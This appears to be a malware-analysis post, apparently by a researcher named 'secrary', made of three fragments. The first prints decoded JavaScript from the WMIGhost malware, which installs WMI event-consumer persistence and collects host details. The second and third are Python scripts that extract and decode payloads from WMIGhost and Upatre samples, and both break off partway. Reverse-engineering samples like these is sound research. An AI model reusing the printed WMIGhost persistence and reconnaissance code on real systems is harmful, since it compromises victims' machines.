secrary

function e(e,t){var n="winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",r=GetObject(n+":ActiveScriptEventConsumer").spawninstance_();r.name="ProbeScriptFint",r.scriptingengine="javascript",r.ScriptText=t+"var sOwner='"+e+"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:fun

secrary

input_ = input("WMIGhost sample: ")

with open(input_, 'rb+') as file:
    data = file.read()[0x3028: 0x3028 + 0x137A]

    with open(input_ + "_func.txt", "w") as outfile:
        for i, n in enumerate(data):
            outfile.write(chr(data[i] ^ 0x63 ^ 0xe9))

secrary

import ctypes
import binascii

input_ = input("Upatre sample: ")


with open(input_, 'rb+') as file:
    data = file.read()[0x66d: 0x66d + 0xe40]
    uncompressed = ctypes.create_string_buffer(0x1200)
    final_size = ctypes.c_ulong(0)